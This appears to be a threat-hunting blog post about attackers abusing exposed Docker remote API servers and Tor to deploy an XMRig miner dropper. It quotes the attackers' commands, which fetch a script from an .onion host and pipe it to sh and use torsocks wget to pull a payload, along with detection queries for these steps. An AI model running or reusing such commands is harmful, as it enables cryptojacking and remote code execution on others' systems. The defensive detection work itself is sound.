173. Adversaries Abuse Docker Remote API Servers and Tor Network
Hello everyone!
We are talking a lot about Windows threats, but let's look at Linux and containers today as these are common targets of those involved in cryptominers distribution.
According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command was executed:
apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh
Despite the fact it was executed in the adversary-created container, it's good to relevant detections. For example, abusing apk to set up Tor:
event_type: "processcreatenix"
AND
proc_file_name: "apk"
AND
cmdline: "add" AND "tor"
One more thing - using cURL over Tor:
event_type: "processcreatenix"
AND
proc_file_name: "curl"
AND
cmdline: ("proxy" AND "socks5h" AND "9050")
Also, the threat actors used torsocks to route traffic through the Tor network and downloaded a Zstandard-compressed (.zst) payload:
torsocks wget -O /tmp/system.zst "http://2h573qd[.]onion:9000/binary/system-linux-$( uname -m).zst"
Here, for example, we can hunt for torsocks abuse to run wget or curl:
event_type: "processcreatenix"
AND
proc_file_name: "torsocks"
AND
cmdline: ("wget" OR "curl")
The payload is a dropper for the XMRig cryptocurrency miner! That's it!
See you tomorrow!
Comments
Post a Comment